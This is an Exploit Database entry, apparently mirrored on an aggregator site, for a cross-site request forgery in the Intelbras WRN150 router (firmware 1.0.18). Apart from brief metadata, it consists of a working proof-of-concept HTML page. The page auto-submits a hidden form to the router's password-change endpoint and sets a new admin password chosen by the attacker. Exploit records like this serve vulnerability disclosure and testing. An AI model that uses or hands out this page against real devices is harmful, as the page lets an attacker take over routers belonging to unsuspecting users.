Intelbras Router WRN150 1.0.18 – Cross-Site Request Forgery

• Exploit Database
• 143 阅读

• 作者： Prof. Joas Antonio
  日期： 2019-10-28
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/47545/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27

  Exploit Title: Intelbras Router WRN150 1.0.18 - Cross-Site Request Forgery Date: 2019-10-25 Exploit Author: Prof. Joas Antonio Vendor Homepage: https://www.intelbras.com/pt-br/ Software Link: http://en.intelbras.com.br/node/25896 Version: 1.0.18 Tested on: Windows CVE : N/A   #################### # PoC1: https://www.youtube.com/watch?v=V188HHDMbGM&feature=youtu.be   <html> <body> <form action="http://10.0.0.1/goform/SysToolChangePwd" method="POST"> <input type="hidden" name="GO" value="system_password.asp"> <input type="hidden" name="SYSPSC" value="0"> <input class="text" type="password" name="SYSOPS" value="hack123"/> <input class="text" type="password" name="SYSPS" value="mrrobot"/> <input class="text" type="password" name="SYSPS2" value="mrrobot"/> </form> <script> document.forms[0].submit(); </script> </body> </html>